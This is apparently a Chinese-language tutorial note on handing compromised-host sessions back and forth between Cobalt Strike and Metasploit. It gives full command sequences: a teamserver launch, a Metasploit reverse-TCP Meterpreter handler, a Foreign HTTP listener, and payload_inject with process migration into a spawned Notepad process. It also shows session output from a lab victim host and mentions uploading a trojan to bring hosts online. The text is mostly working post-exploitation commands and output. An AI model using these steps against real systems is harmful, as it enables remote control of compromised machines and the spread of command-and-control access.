cs与msf权限传递
cs传递到msf
1,先启动cs
┌──(root㉿ring04h)-[~/cobalt_strike_4.7] └─# ./teamserver 192.168.196.144 123456 ┌──(root㉿ring04h)-[~/cobalt_strike_4.7] └─# ./start.sh
2,上传木马,上线主机
3,msf配置一个反向连接的tcp监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.196.144 lhost => 192.168.196.144 msf6 exploit(multi/handler) > set lport 12345 lport => 12345 msf6 exploit(multi/handler) > exploit
4,cs配置一个Foreign HTTP监听器
host,port就配置msf所在主机ip,端口就行
5,选择spawn(权力委派的意思)进行转移,然后选中Foreign HTTP监听器就行了
6,msf结果
msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.196.144:12345 [*] Sending stage (176198 bytes) to 192.168.196.10 [-] Meterpreter session 3 is not valid and will be closed [*] 192.168.196.10 - Meterpreter session 3 closed. [*] Sending stage (176198 bytes) to 192.168.196.10 [*] Meterpreter session 4 opened (192.168.196.144:12345 -> 192.168.196.10:60922) at 2024-05-28 23:31:51 -0400 meterpreter > ipconfig
msf传递到cs
1,上传木马,上线主机
2,在cs中添加一个监听器
3,在msf中配置
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/payload_inject) > set lhost 192.168.196.144 //cs的ip lhost => 192.168.196.144 msf6 exploit(windows/local/payload_inject) > set lport 3333 //cs的端口 lport => 3333 msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true DisablePayloadHandler => true msf6 exploit(windows/local/payload_inject) > set prependmigrate true prependmigrate => true msf6 exploit(windows/local/payload_inject) > set session 1 session => 1 msf6 exploit(windows/local/payload_inject) > exploit [*] Running module against DCTEST [*] Spawned Notepad process 1352 [*] Injecting payload into 1352 [*] Preparing 'windows/meterpreter/reverse_tcp' for PID 1352
4,成功